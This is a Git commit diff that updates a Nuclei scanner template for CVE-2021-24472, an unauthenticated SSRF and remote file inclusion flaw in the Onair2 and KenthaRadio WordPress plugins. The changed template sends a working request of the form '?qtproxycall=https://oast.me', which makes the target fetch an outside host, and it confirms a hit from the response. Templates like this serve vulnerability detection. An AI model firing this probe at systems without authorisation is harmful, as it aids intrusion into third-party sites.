daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update FP CVE-2021-24472.yaml

patch-1
Ritik Chaddha 2023-08-04 12:14:56 +05:30 committed by GitHub
parent 3428e4cb6f
commit cedff9d874
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
http/cves/2021/CVE-2021-24472.yaml
View File

@ -4,10 +4,11 @@ info:
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery
author: Suman_Kar
severity: critical
description: Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.
description: |
Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.
reference:
- https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24472
- https://nvd.nist.gov/vuln/detail/CVE-2021-24472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -17,24 +18,24 @@ info:
cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/qt-kentharadio"
framework: wordpress
vendor: qantumthemes
product: kentharadio
tags: wordpress,lfi,ssrf,oast,wpscan,cve,cve2021
tags: wordpress,lfi,ssrf,wp,wp-plugin,wpscan,cve,cve2021
http:
- raw:
- |
GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- method: GET
path:
- '{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: body
words:
- "http"
- "<h1> Interactsh Server </h1>"
- type: status
status: